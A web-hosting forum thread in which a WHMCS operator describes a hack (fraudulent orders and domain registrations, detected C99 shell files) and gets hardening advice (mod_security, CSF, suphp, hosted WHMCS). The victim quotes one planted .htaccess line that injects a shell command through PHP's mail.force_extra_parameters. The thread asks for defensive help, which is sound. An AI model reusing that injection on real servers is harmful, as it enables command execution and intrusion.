Website hacked, whmcs took over and bunch of domains regisered

[raymon]

I am facing really hard time with my account. It has been hacked by some deadbeat who created bunch of orders and registered some domain names. I wonder if there is an issue with loophole or something with whmcs. My whmcs says I should upgrade but HostingZoom offers whmcs 4.4.2 as their latest version.

 

All I know that I ended up with my website inaccessible. It came be permission error. When I tried to access my website (on which whmcs is installed) I got a permission error.

I emailed my host Hosting Zoom and they said I have invalid instruction in .htaccess

This is what I got in htaccess:

php_value mail.force_extra_parameters '-t && ls /home/ > /home/webiano/public_html/result.txt'

 

Then I found a punch of php files which I transferred to my local computer. 3 files were instantly removed by Microsoft Security Essentials and they are called the following:

VirTool:JS/Obfuscator.AQ

VirTool:JS/Obfuscator.BO

Backdoor:PHP/C99shell.G

 

The rest of the files are not detected by Security Essentials but they contain suspcious data/language progs.

 

1) Does any one know how to prevent such malicious take over in the future? any suggestions?

2) I want to restrict login through whmcs to only my range (my country). Is this possible?

3) Do you think imposing a password (htaccess) on the directory of whmcs would make it harder for the hacker to access my whmcs account?

 

I am really unsure how to defend myself. This takeover probably cost me a lot basically because of registered domains $70 and it left me really feeling unsafe regarding the whole thing. I don't know how to approach this issue and prevent future incidents. An insight would be really appreciated.

[mylove4life]

it's not WHMCS thats for sure, but something else with the server. If it was me Id redo the whole computer from scratch and go over all the WHMCS files and website you have..

[brianoz]

There are a lot of ways to defend yourself against this sort of attack, but frankly, since you don't understand what you're doing, you'd be much better looking for a hosted WHMCS solution - where someone else runs your WHMCS on their server and keeps it secure for you.

 

Hope you don't mind me being blunt; I really think this would be the safest thing for you maybe for a year or two until you understand all the issues.

 

It looks a little to me like your host isn't secure either; you should be looking for things like, at an absolute minimum:

• mod_security
  
• CSF firewall, with auto-block for hackers who hit mod_security rules a lot
  
• suphp or fastcgi so php doesn't run as a common user
  
• security hardening - generally
  

 

There are other things like virus/security scanning of uploads which is also a really good idea.

[cmsplushosting]

I agree with this one... Without prior knowledge on administrating or the know-how on keeping stuff secure, a hosted version would be your best bet; managed by someone else or a qualified company to handle your server management tasks. Having this behind you will help immensly.

There are a lot of ways to defend yourself against this sort of attack, but frankly, since you don't understand what you're doing, you'd be much better looking for a hosted WHMCS solution - where someone else runs your WHMCS on their server and keeps it secure for you.

 

Hope you don't mind me being blunt; I really think this would be the safest thing for you maybe for a year or two until you understand all the issues.

 

It looks a little to me like your host isn't secure either; you should be looking for things like, at an absolute minimum:

• mod_security
  
• CSF firewall, with auto-block for hackers who hit mod_security rules a lot
  
• suphp or fastcgi so php doesn't run as a common user
  
• security hardening - generally
  

 

There are other things like virus/security scanning of uploads which is also a really good idea.

[Lawrence]

At the very least, I'd suggest hardening your PHP configuration (an insecure configuration is normally how a C99 shell is able to get installed), and invest in CSF and CXS from configserver.com if you are using a cPanel server.